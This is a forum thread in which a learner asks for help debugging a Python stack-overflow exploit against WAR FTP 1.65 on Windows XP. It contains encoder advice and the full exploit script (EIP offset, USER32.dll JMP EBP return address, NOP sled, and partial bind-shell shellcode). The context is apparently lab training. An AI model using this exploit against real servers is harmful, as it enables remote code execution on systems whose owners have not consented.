The Ethical Hacker Network (EH-Net) forum, Programming board
Topic: Frustrated with Shellcode
N3WB134444
« on: June 21, 2010, 08:22:12 AM »

I started coding the WAR FTP 1.65 Remote Code exploit in Python to exploit a Win XP SP2 machine this morning and it's still not finished :(. It went fine up until the point that the shellcode had to be added.

I managed to overwrite EIP with my A's and eventually with a JMP EBP from my USER32.dll file, and even managed to put in my breakpoints where my shellcode was supposed to go; everything worked with OllyDbg. But I kept failing at the shellcode which I generated with msfpayload. I spent the rest of the day playing around with different shellcodes trying to get the blasted thing to work: I played with different connecting shellcodes, VNC injects, encoders and even filtering out bad characters, padding with NOPs, and the blasted thing still wouldn't work.

Could anybody please provide me with any tips for shellcode? I understand the difference between types of shells, e.g. bind and reverse, but the different encoders are throwing me off. Could I have just missed a bad character somewhere? Any help would be much appreciated, thanks :)
n1p
« Reply #1 on: June 23, 2010, 03:37:07 PM »

Better late than never ;) I normally use the alpha_upper encoder, which should remove bad characters. I remember having problems with the shikata_ga_nai encoder and removing bad characters whilst exploiting a program previously.

msfencode -e x86/alpha_upper -t c

Paste that into your exploit code and see. Also happy to look at your code if necessary.

http://seclists.org/metasploit/2006/q4/51 - possibly related

cheers

N3WB134444
« Reply #2 on: June 24, 2010, 04:39:16 AM »

Thanks very much for your help and reply. I will give it a go and let you know how it turns out.

Cheers
n1p
« Reply #3 on: June 24, 2010, 03:21:22 PM »

No problem, do let us know how it turns out :P
N3WB134444
« Reply #4 on: June 25, 2010, 05:04:50 AM »

Well, I tried alpha_upper encoding, reviewed my code and couldn't see anything that terminates the string, so here is my code.

EIP was overwritten at the 476th byte.

I used JMP EBP, which I discovered in USER32.dll, as it had more room for shellcode.

I used a ./msfpayload windows/shell_bind_tcp payload with the x86/alpha encoder.

Any insight that you could provide would be most appreciated, thanks.

#!/usr/bin/python
import socket

# windows/shell_bind_tcp from msfpayload, run through the x86/alpha encoder,
# as pasted in the post (the pasted payload is incomplete)
shell = (
    "\x89\xe6\xd9\xc3\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x41\x41"
)

# return address: JMP EBP at 0x77D5A432 in USER32.dll, written little-endian
ret = "\x32\xa4\xd5\x77"

# 476 bytes of filler reach EIP, then the return address, then a 32-byte
# NOP sled, then the shellcode
buffer = "\x41" * 476 + ret + "\x90" * 32 + shell

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending evil buffer..."
s.connect(('10.16.250.4', 21))
data = s.recv(1024)                                 # read the FTP banner
s.send('USER anonymous' + buffer + '\r\n')          # overflow via the USER argument
data = s.recv(1024)
s.close()